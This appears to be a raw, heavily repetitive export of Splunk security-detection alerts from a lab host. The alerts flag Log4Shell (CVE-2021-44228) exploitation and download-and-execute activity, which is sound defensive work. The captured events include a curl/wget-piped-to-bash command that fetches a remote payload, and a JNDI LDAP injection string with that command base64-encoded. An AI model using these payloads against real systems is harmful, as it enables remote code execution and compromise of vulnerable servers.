risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="DE.CM", 
annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646051, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="DE.CM", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646051, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell 